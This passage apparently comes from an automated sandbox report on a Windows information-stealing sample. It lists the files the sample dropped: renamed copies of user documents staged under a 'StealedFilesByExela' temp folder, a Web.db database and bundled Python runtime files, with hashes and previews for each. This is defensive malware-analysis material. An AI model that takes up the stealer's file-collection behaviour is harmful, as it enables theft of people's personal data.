                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\SUAVTZKNFL.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\NEBFQQYWPS.docx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.692704155467908
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                                                                                                                                                                                                  MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                                                                                                                                                                                                  SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                                                                                                                                                                                                  SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                  SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\PIVFAGEAAV.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.685942106278079
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                                                                                                                                                                  MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                                                                                                                                                                  SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                                                                                                                                                                  SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                                                                                                                                                                  SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6969712158039245
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                                                                                                                                                                  MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                                                                                                                                                                  SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                                                                                                                                                                  SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                                                                  SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\QNCYCDFIJJ.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                                  MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                                  SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                                  SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                                  SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\SQSJKEBWDT.mp3

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                  MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                  SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                  SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                  SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.702263764575455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                                                                                                                                                                                  MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                                                                                                                                                                                  SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                                                                                                                                                                                  SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                                                                                                                                                                                  SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Web.db

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):97168
                                                                                                                                                                                                                                  Entropy (8bit):6.424686954579329
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yKHLG4SsAzAvadZw+1Hcx8uIYNUzU6Ha4aecbK/zJZ0/b:yKrfZ+jPYNz6Ha4aecbK/FZK
                                                                                                                                                                                                                                  MD5:A87575E7CF8967E481241F13940EE4F7
                                                                                                                                                                                                                                  SHA1:879098B8A353A39E16C79E6479195D43CE98629E
                                                                                                                                                                                                                                  SHA-256:DED5ADAA94341E6C62AEA03845762591666381DCA30EB7C17261DD154121B83E
                                                                                                                                                                                                                                  SHA-512:E112F267AE4C9A592D0DD2A19B50187EB13E25F23DED74C2E6CCDE458BCDAEE99F4E3E0A00BAF0E3362167AE7B7FE4F96ECBCD265CC584C1C3A4D1AC316E92F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SolaraV4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.not-a-virus.HEUR.RemoteAdmin.Win64.Remsim.gen.13211.29605.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.not-a-virus.HEUR.RemoteAdmin.Win64.Remsim.gen.13211.29605.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.BScope.Trojan.Wacatac.4653.13746.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.BScope.Trojan.Wacatac.4653.13746.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: LisectAVT_2403002A_216.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: LaZagne.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Python.Psw.25309.14489.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...Y.-a.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd

                                                                                                                                                                                                                                  Download File
